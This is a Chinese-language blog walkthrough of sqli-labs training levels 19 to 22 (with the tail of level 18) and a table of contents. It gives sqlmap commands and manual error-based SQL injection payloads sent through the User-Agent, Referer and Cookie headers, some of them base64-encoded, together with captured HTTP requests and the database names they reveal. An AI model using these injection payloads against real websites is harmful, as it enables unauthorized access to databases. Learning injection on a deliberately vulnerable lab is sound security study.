<br>Your IP ADDRESS is: 127.0.0.1<br><font color= "#FFFF00" font size = 3 ></font><font color= "#0000ff" font size = 3 >Your User Agent is: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0',1,extractvalue(1,concat('~',database())))#</font><br>XPATH syntax error: '~security'<br><br><img src="https://img.uj5u.com/2021/06/25/245935250618121.jpg"  /><br>

后面爆欄位值同less-11，改一下payload即可

總結

看原始碼，就像考試作弊，心懷愧疚~~（躍躍欲試）~~

level引數：

1>探測等級： --level 5

--level 5 指的是需要執行的測驗等級

一共有5個等級（1-5）不加 level 時，默認是1

5級包含的payload最多，會自動破解出cookie、XFF等頭部注入，相對應他的速度也比較慢，

level=2 http cookie會測驗

level=3 http user-agent/referer頭會測驗

在不能確定哪個payload或引數為注入點時，建議使用高的level值，

Less-19

date：2020-11-22 10:01:30

程序

sqlmap

bp抓包右鍵copy to file生成19.txt

python sqlmap.py -r 19.txt --level=5 --risk=3 --dbs --batch

后續同less-11

手工注入

看標題，referer注入，看來后面的題目都是頭注入了

打開hackbar，點擊post data，輸入正確的用戶名密碼，提示我的referer是啥啥啥，再次確定就是referer頭注入

不知道為啥hackbar同時搞postdata和referer，referer沒有起作用，上bp：

POST /Less-19/ HTTP/1.1Host: www.sqli-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://www.sqli-labs.com/Less-19/'Content-Type: application/x-www-form-urlencodedContent-Length: 34Origin: http://www.sqli-labs.comDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Pragma: no-cacheCache-Control: no-cacheuname=admin&passwd=1&submit=Submit

輸出：

<br>Your IP ADDRESS is: 127.0.0.1<br><font color= "#FFFF00" font size = 3 ></font><font color= "#0000ff" font size = 3 >Your Referer is: http://www.sqli-labs.com/Less-19/'</font><br>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '127.0.0.1')' at line 1<br><br><img src="https://img.uj5u.com/2021/06/25/245935250618121.jpg" /><br>

又是insert操作啦，利用報錯注入extractvalue()拿當前資料庫名

POST /Less-19/ HTTP/1.1Host: www.sqli-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://www.sqli-labs.com/Less-19/', extractvalue(1,concat('~',database()))) # Content-Type: application/x-www-form-urlencodedContent-Length: 35Origin: http://www.sqli-labs.comDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Pragma: no-cacheCache-Control: no-cacheuname=admin&passwd=1&submit=Submit

根據輸出，拿到當前資料庫名security：

<br>Your IP ADDRESS is: 127.0.0.1<br><font color= "#FFFF00" font size = 3 ></font><font color= "#0000ff" font size = 3 >Your Referer is: http://www.sqli-labs.com/Less-19/', extractvalue(1,concat('~',database()))) #</font><br>XPATH syntax error: '~security'<br><br><img src="https://img.uj5u.com/2021/06/25/245935250618121.jpg" /><br>

后續操作同less-11

總結

sqlmap新操作，感覺它不太行了？應該是我不太行，去百度sqlmap的使用姿勢

Less-20

date：2020-11-22 10:17:02

程序

sqlmap

bp抓包右鍵copy to file生成20.txt

python sqlmap.py -r 22.txt --level=5 --risk=3 --dbs --batch

后續同less-11

手工注入

先用admin\1登錄

題目給了我的cookie：

YOUR USER AGENT IS : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0YOUR IP ADDRESS IS : 127.0.0.1DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIREYOUR COOKIE : uname = admin and expires: Sun 22 Nov 2020 - 11:22:50Your Login name:adminYour Password:1Your ID:8

那就cookie注入唄，bp抓包

GET /Less-20/index.php HTTP/1.1Host: www.sqli-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://www.sqli-labs.com/Less-20/index.phpDNT: 1Connection: closeCookie: uname=adminUpgrade-Insecure-Requests: 1Pragma: no-cacheCache-Control: no-cache

cookie后單引號開戰

Cookie: uname=admin'

輸出：

>Issue with your mysql: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin'' LIMIT 0,1' at line 1

后面的sql橘子拿到了，就開始常規姿勢閉合，拿database()

payload:

Cookie: uname=admin' and extractvalue(1,concat('~',database())) #

輸出，拿到庫名security：

Issue with your mysql: XPATH syntax error: '~security'

拿欄位內容同less-11

總結

報錯注入真好用

前面寫了題，后面就越寫越快了，開心

Less-21

date：2020-11-22 10:29:18

程序

sqlmap

bp抓包右鍵copy to file生成21.txt

python sqlmap.py -r 22.txt --level=5 --risk=3 --dbs --batch

后續同less-11

手工注入

老規矩，輸入17關重置后的賬戶密碼admin/1

題目還是cookie注入：

YOUR USER AGENT IS : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0YOUR IP ADDRESS IS : 127.0.0.1DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIREYOUR COOKIE : uname = YWRtaW4= and expires: Sun 22 Nov 2020 - 11:29:55Your Login name:adminYour Password:1Your ID:8

看標題是復雜版的...

啊這，先試試引號，竟然不報錯了！

有趣

看了下題目uname那里發生了改變，抓包發現uname是YWRtaW4，改成admin試試

Cookie: uname=admin"

輸出

>Issue with your mysql: Illegal mix of collations (gbk_chinese_ci,IMPLICIT) and (latin1_swedish_ci,COERCIBLE) for operation '='

說是編碼集的問題，好叭我去百度闖關秘籍了

對cookie的值進行了base64的處理，其他和20關一樣

也就是說在注入的時候需要把注入陳述句搞一下編碼，打開hackbar，打開base64編碼，輸入admin'

bp發包設定cookie

Cookie: uname=YWRtaW4n

輸出：

>Issue with your mysql: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin'') LIMIT 0,1' at line 1

拿到后面的句子，開始閉合注入，不知為何我轉義后的報錯注入代碼放進payload沒有反應，換一個加密工具就好了

用報錯注入拿資料

明文：admin') and extractvalue(1,concat(',',database())) # base64轉義：YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KCcsJyxkYXRhYmFzZSgpKSkgIyA=設定cookie：Cookie: uname=YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KCcsJyxkYXRhYmFzZSgpKSkgIyA=

輸出：

>YOUR COOKIE : uname = YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KCcsJyxkYXRhYmFzZSgpKSkgIyA= and expires: Sun 22 Nov 2020 - 12:30:51<br></font>Issue with your mysql: XPATH syntax error: ',security'

拿到資料庫名，拿別的資料同less-11

總結

base64使用場景及原理

base64 最早就是用來郵件傳輸協議中的，原因是郵件傳輸協議只支持 ascii 字符傳遞，因此如果要傳輸二進制檔案，如：圖片、視頻是無法實作的，

因此 base64 就可以用來將二進制檔案內容編碼為只包含 ascii 字符的內容，

我們知道在計算機中任何資料都是按ascii碼存盤的，而ascii碼的128～255之間的值是不可見字符，而在網路上交換資料時，比如說從A地傳到B地，往往要經過多個路由設備，由于不同的設備對字符的處理方式有一些不同，這樣那些不可見字符就有可能被處理錯誤，這是不利于傳輸的，所以就先把資料先做一個Base64編碼，統統變成可見字符，這樣出錯的可能性就大降低了，

Less-22

date：2020-11-22 11:35:53

程序

sqlmap

bp抓包右鍵copy to file生成22.txt

python sqlmap.py -r 22.txt --level=5 --risk=3 --dbs --batch

后續同less-11

手工注入

還是用admin\1登錄，顯示cookie，那就還是cookie注入

YOUR USER AGENT IS : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0YOUR IP ADDRESS IS : 127.0.0.1DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIREYOUR COOKIE : uname = YWRtaW4= and expires: Sun 22 Nov 2020 - 12:37:26Your Login name:adminYour Password:1Your ID:8

看見uname = YWRtaW4= ，那就應該還是用base64加密

使用上一題的payload

明文：admin') and extractvalue(1,concat(',',database())) # base64：YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KCcsJyxkYXRhYmFzZSgpKSkgIyA=

發現沒有報錯顯示，那么說明沒有閉合成功，看標題是雙引號閉合，那就改一下引號

明文：admin") and extractvalue(1,concat(',',database())) # base64：YWRtaW4iKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KCcsJyxkYXRhYmFzZSgpKSkgIyA=

輸出：

Issue with your mysql: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') and extractvalue(1,concat(',',database())) # " LIMIT 0,1' at line 1

哪到后面的sql陳述句，發現只需要閉合一個雙引號，不需要），開干

明文：admin" and extractvalue(1,concat(',',database())) # base64：YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoJywnLGRhdGFiYXNlKCkpKSAjIA==

輸出：

Issue with your mysql: XPATH syntax error: ',security'

拿到資料庫名，拿別的資料同less-11

總結

我發現sqlmap跑得有一點慢

轉載請註明出處，本文鏈接：https://www.uj5u.com/qita/288381.html

標籤：其他

上一篇：網路時鐘服務器(網路校時服務器)無法同步的排查方法

下一篇：RobotFramework + Python 自動化入門三（Web自動化)

sqli-labs-basic闖關紀錄

sqli-labs-basic通關記錄寶典

Less-1

程序

sqlmap：

手工注入：

總結

Less-2

程序

sqlmap

手工注入

總結

Less-3

程序

sqlmap

手工注入

總結

Less-4

程序

sqlmap

手工注入

總結

Less-5

程序

sqlmap

手工注入

總結

Less-6

程序

sqlmap

手工注入

總結

Less-7

程序

sqlmap

手工注入

總結

Less-8

程序

sqlmap

手工注入

總結

Less-9

程序

sqlmap

手工注入

總結

Less-10

程序

sqlmap

手工注入

總結

Less-11

程序

sqlmap

手工注入

總結

Less-12

程序

sqlmap

手工注入

總結

Less-13

程序

sqlmap

手工注入

總結

Less-14

程序

sqlmap

手工注入

總結

Less-15

程序

sqlmap

手工注入

總結

Less-16

程序

sqlmap